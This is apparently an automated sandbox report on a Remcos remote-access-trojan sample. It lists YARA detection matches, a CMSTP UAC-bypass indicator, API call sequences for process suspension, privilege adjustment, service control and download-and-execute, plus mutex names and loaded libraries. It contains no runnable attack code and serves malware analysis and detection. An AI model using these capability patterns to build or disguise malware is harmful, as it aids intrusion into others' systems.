Source: 00000001.00000000.1312795362.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
Source: Process Memory Space: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe PID: 7704, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Code function: 1_2_0041AECC OpenProcess,NtSuspendProcess,CloseHandle,1_2_0041AECC
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0041AEF8 OpenProcess,NtResumeProcess,CloseHandle,1_2_0041AEF8
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00415A51 ExitWindowsEx,LoadLibraryA,GetProcAddress,1_2_00415A51
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0043D04B1_2_0043D04B
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0042707E1_2_0042707E
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0041301D1_2_0041301D
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_004410301_2_00441030
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_004531101_2_00453110
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_004271B81_2_004271B8
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0041D27C1_2_0041D27C
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_004522E21_2_004522E2
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0043D2A81_2_0043D2A8
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_004373601_2_00437360
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_004363BA1_2_004363BA
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0042645F1_2_0042645F
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_004315821_2_00431582
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0043672C1_2_0043672C
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0041E7EA1_2_0041E7EA
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0044C9491_2_0044C949
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_004269D61_2_004269D6
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_004369D61_2_004369D6
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0043CBED1_2_0043CBED
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00432C541_2_00432C54
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00436C9D1_2_00436C9D
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0043CE1C1_2_0043CE1C
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00436F581_2_00436F58
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00434F321_2_00434F32
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: String function: 00401F66 appears 50 times
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: String function: 004020E7 appears 40 times
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: String function: 00433AB0 appears 42 times
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: String function: 004341C0 appears 55 times
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                          Source: 1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 1.2.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 1.2.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                          Source: 1.2.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 00000001.00000000.1312795362.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: Process Memory Space: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe PID: 7704, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@1/2@2/2
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00416C9D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,1_2_00416C9D
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0040E2F1 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,1_2_0040E2F1
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0041A84A FindResourceA,LoadResource,LockResource,SizeofResource,1_2_0041A84A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00419DBA OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,1_2_00419DBA
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].json
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-JLQBNY
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: Software\1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: Rmc-JLQBNY1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: Exe1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: Exe1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: Rmc-JLQBNY1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: 0TG1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: Inj1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: Inj1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: PSG1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: exepath1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: PSG1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: exepath1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: licence1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: dMG1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: hSG1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: Administrator1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: User1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: del1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: del1_2_0040D83A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCommand line argument: del1_2_0040D83A
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeReversingLabs: Detection: 71%
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeVirustotal: Detection: 64%
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: winmm.dll
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: wininet.dll
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: netutils.dll
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: wldp.dll
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: profapi.dll
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0041BEEE LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,1_2_0041BEEE
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_004560BF push ecx; ret 1_2_004560D2
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00434206 push ecx; ret 1_2_00434219
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_004569F0 push eax; ret 1_2_00456A0E
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00406128 ShellExecuteW,URLDownloadToFileW,1_2_00406128
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00419DBA OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,1_2_00419DBA
